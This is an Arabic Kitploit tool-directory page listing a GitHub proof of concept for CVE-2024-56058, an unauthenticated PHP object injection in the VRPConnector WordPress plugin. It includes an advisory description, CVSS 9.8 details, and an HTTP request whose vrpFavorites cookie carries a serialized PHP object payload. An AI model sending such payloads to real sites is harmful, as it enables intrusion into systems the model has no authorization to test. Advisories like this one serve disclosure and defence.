Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-56058 — VRPConnector <= 2.0.1 - Unauthenticated PHP Object Injection | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-56058
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-56058

CVE-2024-56058

VRPConnector <= 2.0.1 - Unauthenticated PHP Object Injection

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-56058

VRPConnector <= 2.0.1 - حقن كائن PHP غير موثَّق

الوصف

إضافة VRPConnector لووردبريس معرضة لحقن كائن PHP في الإصدارات حتى 2.0.1 شاملة، وذلك عبر إلغاء تسلسل المدخلات غير الموثوقة. هذا يمكن المهاجمين غير الموثَّقين من حقن كائن PHP. لا توجد سلسلة POP معروفة موجودة في البرنامج الضعيف. إذا وُجدت سلسلة POP عبر إضافة أو قالب إضافي مثبت على النظام المستهدف، فقد تسمح للمهاجم بحذف ملفات عشوائية، أو استرجاع بيانات حساسة، أو تنفيذ كود.

التفاصيل

العنصرالقيمة
النوعإضافة
الاسم المختصرvrpconnector
الإصدار المتأثر2.0.1
درجة CVSS9.8
تصنيف CVSSحرج
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVECVE-2024-56058
الحالةنشط

إثبات الاختراق

root@kitploit:~
GET / HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: vrpFavorites=O:20:"PHP_Object_Injection":0:{}
Upgrade-Insecure-Requests: 1
Priority: u=0, i

تنزيل الأداة